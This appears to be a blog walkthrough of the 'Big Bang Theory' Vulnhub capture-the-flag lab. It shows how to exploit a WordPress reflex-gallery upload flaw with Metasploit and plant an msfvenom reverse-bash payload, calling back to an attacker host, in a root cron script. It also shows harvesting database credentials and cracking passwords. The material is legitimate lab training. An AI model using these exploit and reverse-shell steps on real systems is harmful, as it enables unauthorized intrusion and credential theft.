Introduction
Today, we are going to complete a Capture
The Flag challenge hosted on Vulnhub. This lab is based on a popular CBS
series: The Big Bang Theory and as I am a huge fan of this show, it's gonna fun
to solve it. This lab is developed by emargkos (https://twitter.com/emaragkos)
and you can download it from
here(https://www.vulnhub.com/entry/tbbt-funwithflags,437/). this lab is a
combination of capture the flag challenge and boot2root which means we have to
find flags and root the lab; seven flags are hidden in the lab.
Penetration Testing Methodology
·
Flag #1: Sheldon
o
Nmap Scan
·
Flag #2: Amy
o
Browsing HTTP Service
o
Directory Bruteforce
o
Enumeration using WPScan
o
Exploiting Vulnerable Plugin
o
Getting Meterpreter
o
Downloading Binary File
o
Reading Flag using Strings
·
Flag #3: Penny
o
Enumerating Directories
o
Decoding Base64
o
Reading Flag
·
Flag #4: Leonard
o
Enumerating Directories
o
Enumerating Crontab
o
Crafting Payload using Msfvenom
o
Uploading Payload
o
Getting Root Shell
o
Reading Flag
·
Flag #5: Bernadette
o
Enumerating Directories
o
Grabbing Database Credentials
o
Enumerating Database
o
Reading Flag
·
Flag #6: Raj
o
Enumerating Directories
o
Grabbing Database Credentials
o
Enumerating Tables
o
Reading Flag
·
Flag #7: Howard
o
Enumerating FTP Service
o
Downloading Locked Archive File
o
Brute-forcing Password using
fcrackzip
o
Brute-forcing Password using
stegcracker
o
Reading Flag
Walkthrough
Flag #1: Sheldon
As DHCP is disabled in this machine, we
have ourselves a static IP Address. It is 192.168.1.105. Let’s start pawning
the lab, firstly by scanning it and for the scan, we will use nmap with the
following command:
nmap -p- -A 192.168.1.105
Nmap showed us that various ports are open
with multiple services running on them. These ports are 21(FTP), 22(SSH),
80(HTTP), 1337. If we look closer at the port 1337, we found our first flag
i.e. Sheldon.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Flag #2: Amy
Moving on, we opened the target IP address
in the browser and here we found an image as shown below:
Apart from Sheldon's creepy smile and
Penny's sarcastic bung, all that there was on this page was this image. So, to
proceed forward with the directory bruteforce. We used the dirb tool for the
same.
dirb http://192.168.1.105
Without taking much time, our reliable dirb
gave was a directory /music/wordpress/. It is a pretty odd directory to find.
But if the machine is based on Big Bang theory then who are we to judge. We
decided to browse the URL.
https://192.168.1.105/music/wordpress
As we got wordpress directory, and the
web-page that opened up seems to be made in Wordpress. It was only natural to
enumerate Wordpress. For this task, we decided to use WPScan.
wpscan --url http://192.168.1.105/music/wordpress/
In
no time, we have got ourselves a vulnerable plugin on our hands. It is the
world-famous reflex-gallery.
Our experience with this plugin tells us
that we have a perfect exploit for this plugin in our Metasploit Framework.
Let's get ourselves a sweet meterpreter.
use
exploit/unix/webapp/wp_reflex_file_upload
set rhosts 192.168.1.105
set target uri /music/wordpress
exploit
cd /home
ls
cd amy
ls
cat notes.txt
download secretdiary /root/Desktop/
We got our metepreter in the blink of an
eye. Now that we have a shell. We need to enumerate the machine for another
flag. We traversed in the home directory of the current user. Here we listed
the contents to find ourselves a directory named amy/. First Sheldon then Amy.
This is turning out to be a nice path for flags. We enter the amy/ directory
and we find 2 files here. We read the text file named notes using the cat
command. It tells us that another file named secretdiary is Amy's diary. But no
need to be happy. The notes say that once she is famous she will write secrets
in it. Like that's gonna happen any time sooner. We are told that Amy used a
very strong password that cannot be brute-forced. It is 18 digit, alphanumeric,
uppercase/lowercase with symbols. How kind of Amy to tell us what the password
is made up of. Also, we are told that the program is compiled. That means that
it is a binary. We need to figure out another approach towards it. But it is
not gonna do any good sitting there. So, we downloaded the secretdiary to our
attacker machine.
Now that we have the secretdiary on our
hands, we need to figure out a way to get the password to unlock it. As it is a
binary file, there must be a location where the password is stored. Since it a
text inside a binary file, we need the strings command to read from it.
strings secretdiary
We can see that we have the password,
"P@SSw0rd123Sh3ld0n". Sorry to say Amy but is not a strong password.
I recommend that you change it. But strings command has done more than it was
asked. It gave us the amy flag. So, we don’t need to log in.
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Flag #3: Penny
We went back to the meterpreter and went
back to the home directory. We saw that there were a lot of directories. But we
decided we need the Penny flag. So, we traversed into the penny directory. We
listed the contents of this directory to find a hidden file called
.FLAG.penny.txt. Come on! we wanted it to be tougher. We read the file to find a
base64 encoded text.
cd penny
ls
cat .FLAG.penny.txt
We copied the encoded text and went back to
our attacker machine. Here, we decoded the text using the echo command. It gave
us the penny flag. 3 Flags down!!
echo "" | base64
-d
FLAG-penny{dace52bdb2a0b3f899dfb3423a992b25}
Flag #4: Leonard
Time to go back to the home directory. Here
we traversed into the Leonard directory. Let's see if Leonard is good at hiding
his flag. We listed the contents of this directory to find a script. Interesting!
We read the script. There was no script. Typical Leonard. It says that they
have a thermostat connected to the IoT device. This means that the script can
manipulate the temperature. As we all know that Sheldon needs to keep his
thermostat at 71 degrees. This is uncomfortable for Leonard. So, this script
will change the temperature to Leonard's preference every minute. I smell corn!
cd leonard
ls
cat thermostat_set_temp.sh
Time to check the crontab. As suspected, we
have this script inside the crontab file. It is scheduled to run every minute.
cat /etc/crontab
If
we are not wrong, this might give us root. Let's wait and watch. Time to craft
a raw bash payload using the msfvenom.
msfvenom -p
cmd/unix/reverse_bash lhost=192.168.1.111 lport=1234 R
We copied the payload on our clipboard and
used the echo command to paste the payload inside an empty file having the same
name as Leonard's script.
echo
"" > thermostat_set_temp.sh
All that's left to do is upload this script
from our machine to the target machine. As we have a meterpreter this can be
done using the upload command.
upload /root/thermostat_set_temp.sh
ls
cat thermostat_set_temp.sh
Before uploading, we started a listener at
the port that we mentioned at the time of crafting the payload. Now after we
upload the payload, we got to wait a minute for the cronjob to execute the
script. In no time we have a session. We used the id command to gain
information about the user. We have the root shell. Now for the flag. It was in
the current directory. We read the flag using the cat command. We have the
message that we can sit on Sheldon's spot. Dreams do come true!!
nc -lvp 1234
id
cd /root
ls
cat Flag-leonard.txt
FLAG-leonard{17fc95224b65286941c54747704acd3e}
Flag #5: Bernadette
But, although we have the root shell, it
doesn't mean that the challenge is over. We need to find other flags as well.
We went back to our meterpreter shell and started enumerating. This led us to
the /var/www/html/ directory. Here, we found a directory named private. How can
we not open it? SO! we saw that we have a bunch of HTML and php files. Among
them was the db_config.php file. If our experience servers us right, the config
file mostly stores the database password. We decided to take a look. Bazinga!!
We have the Database credentials.
User: bigpharmacorp
Pass: weareevil
Word of Wisdom: If you are a Big Pharma
Company don't keep your password weareevil. This would have been our First
Guess.
ls
cd private
ls
cat db_config.php
We went back to our root shell that we
obtained just a while ago. Here, we ran the python one-liner to convert the
shell into a TTY shell. As soon as we got the proper shell. We attacked the
Database using the credentials that we dug up. We used the queries to inquire about
the databases and tables. Here we found different users, their password and in
Bernadette's description, we have our 5th Flag!!
python -c 'import
pty;pty.spawn("/bin/bash")'
mysql -u bigpharmacorp -p
weareevil
show databases;
use bigpharmacorp;
show tables;
select * from
users;
FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f}
Flag #6: Raj
Since we got this flag inside the database.
It scratched a part of our brain that we might have another database user. Then
it hit us that we have wordpress installed. Wordpress creates its users. We
went on the hunt for that user. We traversed into the directory containing the
wordpress. Here we found the wp-config.php. How convenient! We read the file
using cat command. We found ourselves some credentials.
User: footprintsonthemoon
Pass: footprintsonthemoon1337
Now, who will keep such a password? It must
be our Indian brother Raj!! Let's get that flag.
cd /var/www/html/music/wordpress
ls
cat
wp-config.php
We
logged out from the previous database and logged in using the new credentials.
We enumerated almost all the tables. But we won't take you on that painstaking
journey. We found something in the wp_post table.
mysql -u footprintsonthemoon
footprintsonthemoon1337
show databases;
use footprintsonthemoon;
show tables;
If you read the data form the wp_post
table, you will find the Raz flag tucked in between.
FLAG-raz{40d17a74e28a62eac2df19e206f0987c}
Flag #7: Howard
We enumerated further, but we didn't get
anything new. So we went back to our initial nmap scan. We remembered that we
have a port 21 open as well. So let's login to the FTP. We logged in as
Anonymous User. Here we listed the files to find a directory named pub. Now,
everyone is in the pub including Amy, Bernadette, Howard, Leonard, Penny, Raj,
and Sheldon. They must be here to witness as we capture the last flag. Until
now we don’t have any flag from Howard. Let's check his directory. In this, we
have a note file and a compressed archive. We figured that we that the zip file
was the to be focused so, we downloaded it using the get command.
ftp 192.168.1.105
ls
cd pub
ls
cd howard
ls
get super_secret_nasa_stuff_here.zip
bye
The archive was password-protected, so we
decided to use fcrackzip on it. We brute-forced using the rockyou.txt. It gave
us the password. It was the “astronaut”. Damn! Could have guessed that one. We
unzipped the archive to find ourselves an image. Hmm.
fcrackzip -u -D -p
/usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip
unzip super_secret_nasa_stuff.zip
It didn't take much time before we figured
out that the flag must be hidden inside the image. We used the stegcracker to
bruteforce it using rockyou. It cracked us the password
"iloveyoumom". How very Howardy!! Well, all that left is read the
flag from the file that stagcracker created. This gave us the Howard flag!!
stegcracker /root/marsroversketch.jpg
/usr/share/wordlists/rockyou.txt
cat /root/marsroversketch.jpg.out
This concludes this lab. But can we leave
without saying "It all started with the big bang!".
We at Hacking Articles want to request
everyone to stay at home and self-quarantine yourself for the prevention
against the spread of the Covid-19. Take Care and be Healthy and Keep Hacking!!
